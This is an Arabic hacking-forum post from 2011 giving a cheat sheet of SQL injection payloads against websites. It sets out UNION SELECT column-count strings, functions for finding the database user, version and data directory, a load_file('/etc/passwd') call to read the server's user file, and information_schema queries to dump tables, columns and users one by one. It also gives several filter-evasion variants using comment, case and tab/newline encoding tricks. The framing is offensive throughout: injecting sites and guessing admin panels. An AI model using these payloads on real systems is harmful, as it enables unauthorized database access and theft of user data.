بدايه تعلم الهكر من الصفر الى الاحتراف
مرحبا بكم في منتديات

mr11-11mr.7olm.org

تعلم الهكر وكل شيئ

تعلم صيانه وبرمجه الجوالات

عن اصول الهكر

والكثير من البرامج النادره وبروابط شغاله



مع تحيات HackeR Mobile
بدايه تعلم الهكر من الصفر الى الاحتراف
مرحبا بكم في منتديات

mr11-11mr.7olm.org

تعلم الهكر وكل شيئ

تعلم صيانه وبرمجه الجوالات

عن اصول الهكر

والكثير من البرامج النادره وبروابط شغاله



مع تحيات HackeR Mobile
بدايه تعلم الهكر من الصفر الى الاحتراف
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.


تعليم اصول الهكر
 
الرئيسيةالبوابةالمنشوراتأحدث الصورالتسجيلدخول

 

 اهم اوامر sql

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin

اهم اوامر sql Www_md10
Admin


عدد المساهمات : 341
تاريخ التسجيل : 13/05/2011
العمل/الترفيه : مصور
المزاج المزاج : Don't Play With Me

اهم اوامر sql Empty
مُساهمةموضوع: اهم اوامر sql   اهم اوامر sql Icon_minitimeالثلاثاء سبتمبر 20, 2011 11:17 pm

أهم الأوامر التي تستخدم في الحقن

مع شرح

عدد الأعمدة لتسهيل الحقن


1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,
24,25,26,27,28,29,30,31
,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49
,50,51,52,53,54,55,56,57,58,59
,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,7 6,77
,78,79,80,81,82,83,84,85,86,87
,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,1 03,104
,105,106,107,108,109,110,111
,112,113,114,115,116,117,118,119,120,121,122,123,1 24,125
,126,127,128,129,130,131,132
,133,134,135,136,137,138,139,140,141,142,143,144,1 45
,146,147,148,149,150,151,152,153
,154,155,156,157,158,159,160,161,162,163,164,165
,166,167,168,169,170,171,172,173,174
,175,176,177,178,179,180,181,182,183,184,185,186
,187,188,189,190,191,192,193,194,195
,196,197,198,199,200,201,202,203,204,205,206,207
,208,209,210,211,212,213,214,215,216
,217,218,219,220,221,222,223,224,225,226,227,228
,229,230,231,232,233,234,235,236,237
,238,239,240,241,242,243,244,245,246,247,248,249,2 50
,251,252,253,254,255,256,257,258
,259,260,261,262,263,264,265,266,267,268,269,270,2 71
,272,273,274,275,276,277,278,279
,280,281,282,283,284,285,286,287,288,289,290,291,2 92,
293,294,295,296,297,298,299,300

##################################################


user() :لمعرفة مستخدم قاعدة البيانات يساعدك في التخمين على PhpMyAdmin

version() : معرفة الاصدار 4 أو 5

database() : اسم القاعدة

@@datadir :مكان تواجد قاعدة البيانات

load_file('/etc/passwd') : لقراءة ملف المستخدمين لسيرفر و هي تكون فعالة في 30% من الحالات حسب تقديري الخاص بشرط يكون magic quotes=OFF


concat(user(),0x**6272**,@@version,0x**6272**,data base())

أمر استخراج القاعدة و اليوزر و نسخة القاعدة

##################################################
+order+by+ : معرفة عدد الأعمدة


+union+select+ : دالة الربط لتطبيق الأوامر


############################################

أوامر استخراج الجداول

concat(table_name,0x3a3a,column_name,0x3a3a,table_ schema)


concat_ws(0x3a3a3a,table_name,column_name)


concat(column_name,0x3a,table_schema,0x2e,table_na me)

أوامر استخراج الجداول والأعمدة التي تبدأ لكلمة مثل user admin

وتكتب بين قوسي CHAR ويتم يشفيرها قبل ذلك

group_concat(column_name,0x3a,table_schema,0x2e,ta ble_name)+from+information_schema.columns+where+co lumn_name+like+char()

أمر التنقل بين المعلومات المستخرجة يعني لو أنت تحقن موقع فيه أكثر من ييزر هذا الأمر يسمح لك باستخراجهم واحدا واحدا
كهذه الطريقة limit+2,2+offset+ ... limit+1+offset+ limit+1+offset+ ....


limit+1+offset+



union+all+select+ دالة الربط لتطبيق الأوامر ويسمح لك بالتخطي بعض الفلترات


بعد طرق تخطي الفلترة

hex(unhex()

AES_ENCRYPT()

AES_ENCRYPT().

UnIOn+AlL+SeLEcT

/**/UNION/**/SELECT(/**/1,2,3,(concat_ws(0x3a,table_schema,table_name,colu mn_name) ,5,6,7,8,9,10,11,12,13/**/FROM/**/INFORMATION_SCHEMA.COLUMNS)/**/LIMIT/**/180,1


/**/UNION/**/SELECT/**/1,2,3,CONVERT(concat_ws(0x3a,table_schema,table_na me,column_name) USING latin1),5,6,7,8,9,10,11,12,13/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/LIMIT/**/180,1/*


/ ** / UNION / ** / select / ** / 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 / ** / from / ** / INFORMATION_SCHEMA.COLUMNS / ** / LIMIT / ** / 180,1 / *


/*--*/ UNION/*--*/ select /*--*/ 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 /*--*/ from /*--*/ INFORMATION_SCHEMA.COLUMNS/*--*/LIMIT /*--*/ 180,1 / *


+ UNION+ select + 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 /*--*/ from + INFORMATION_SCHEMA.COLUMNS+LIMIT + 180,1


%09 UNION%09 select %09 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 %09 from %09 INFORMATION_SCHEMA.COLUMNS%09 LIMIT %09 180,1


%0A UNION%09 select %0A 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 %0A from %0A INFORMATION_SCHEMA.COLUMNS %0A LIMIT %0A 180,1

##################################################

مواقع تخمين لوحات التحكم


[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]











[/center]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://mr11-11mr.7olm.org
 
اهم اوامر sql
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» جميع اوامر sql & xss
» اوامر الدوس الخطيره
» اوامر تفليش وفورمات وباك اب للجوالات الصينية

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
بدايه تعلم الهكر من الصفر الى الاحتراف :: دروس لرفع الشلات اختراق المواقع الاجهزه دورات مجانيه شرحphp شرح Perl-
انتقل الى: